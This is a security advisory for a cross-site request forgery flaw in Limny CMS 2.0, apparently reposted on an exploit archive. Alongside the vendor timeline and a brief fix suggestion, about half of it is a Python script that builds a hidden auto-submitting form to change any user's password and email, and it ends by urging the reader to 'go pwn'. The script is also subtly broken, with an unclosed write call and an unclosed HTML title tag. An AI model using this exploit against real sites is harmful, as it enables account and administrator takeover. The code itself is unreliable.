Limny v2.0 Change Email and Password CSRF Exploit

=================================================
Limny v2.0 Change Email and Password CSRF Exploit
=================================================

/????????????????????????????\
:Limny 2.0 Change Pass CSRF   : 
\____________________________/
/Discovered By:              \
|Luis Santana                 |
\____________________________/
 
Overview
~_?~_?~_?~_?~~_?~_?~_?~_?~_?~_?~
The Limny 2.0 CMS is vulnerable to a Cross-Site-Request Forgery exploit which allows for a malicious attacker to change the password, and email address, of any user, including the administrator.
 
Product Information
~_?~_?~_?~_?~~_?~_?~_?~_?~_?~_?~
Product/Script: Limny CMS
Affected Version: 2.0
 
Vulnerability Type: CSRF
Security Risk: High
 
Vendor URL: http://www.limny.org/
Product/Script Demo: http://demo.opensourcecms.com/limny
 
Vendor Status: Informed
Patch/Fix Status:
Advisory Timeline: 02/16/10 : Vulnerability found, PoC created and vendor contacted
                      Update: Vendor has started working on patch.
                              Update: A Patch has been created
 
Advisory URL:
 
Product Description
~_?~_?~_?~_?~~_?~_?~_?~_?~_?~_?~
Limny is a powerful, module-based and lightweight CMS. It is programmed in PHP and uses MySQL database.
 
Vulnerability Details
~_?~_?~_?~_?~~_?~_?~_?~_?~_?~_?~
By crafting a simple hidden form webpage with a simple javascript form auto-submitter hidden inside of an iframe an attacker is able to change the password, and email address of any user.
 
Proof of Concept
~_?~_?~_?~_?~~_?~_?~_?~_?~_?~_?~
See included .zip file for unweaponized (you need to click the "Save" button for the exploit to launch) PoC
 
Patch/Fix Suggestion(s)
~_?~_?~_?~_?~~_?~_?~_?~_?~_?~_?~
Implementing form cookies and checking for HTTP Referer would provide an adequate means of patching this vulnerability.
 
Security Risk
~_?~_?~_?~_?~~_?~_?~_?~_?~_?~_?~
This vulnerability is estimated to have a HIGH security risk.
 
Author:
~_?~_?~_?~_?~~_?~_?~_?~_?~_?~_?~
The Author and Researcher of this Advisory is Luis Santana of the HackTalk Security Team
 
'''
Limny 2.0 Change Email & Password CSRF Exploit
Discovered By: Luis Santana
Script By: Luis Santana
HackTalk.net
 
Shoutz to the Evilzone.org community, Shardy, Rage, Xires and Stacy
'''
 
__version__= 1.0
 
p = open("pwn.html", "w")
p.write('''<html>
<head>
<title>Limny2.0 Change Password & Email CSRF by Luis Santana
</head>
<body>
<h1>Press Save and Pwn Away</h1>
''')
base = str(input("What is the target website? "))
p.write('<form name="profile" action="')
p.write(base)
p.write('''/?q=user" method="post" enctype="multipart/form-data">
''')
password = str(input("What password do you want? "))
p.write('''<table>
<td><input name="pass" type="hidden" maxlength="64" value="''')
p.write(password)
p.write('''" /></td></tr>
<td><input name="confirmpass" type="hidden" maxlength="64" value="''')
p.write(password)
p.write('''" /></td></tr>
<tr><td colspan="2"><hr size="1" /></td></tr>
<tr><td>Theme:</td><td><select name="theme"><option value="gray" selected="selected">Gray</option></select></td></tr>
<tr><td>Language:</td><td><select name="language"><option value="english" selected="selected">English</option></select></td></tr>
<td><input name="email" type="hidden" maxlength="128" value="'''
email = str(input("What email do you want? "))
p.write(email)
p.write('" /></td></tr>')
#This will change the email address of the administrator but there is no way to get around it
p.write('''<td><input name="picture" type="hidden" value="" /></td></tr>
<tr><td colspan="2"><hr size="1" /></td></tr><tr><td colspan="2"><button name="submit" type="submit">Save</button></table></form>
</body>
</html>''')
p.close()
print("pwn.html has been created successfully! Upload this file to your webserver and then go pwn")



#  0day.today [2018-03-14]  #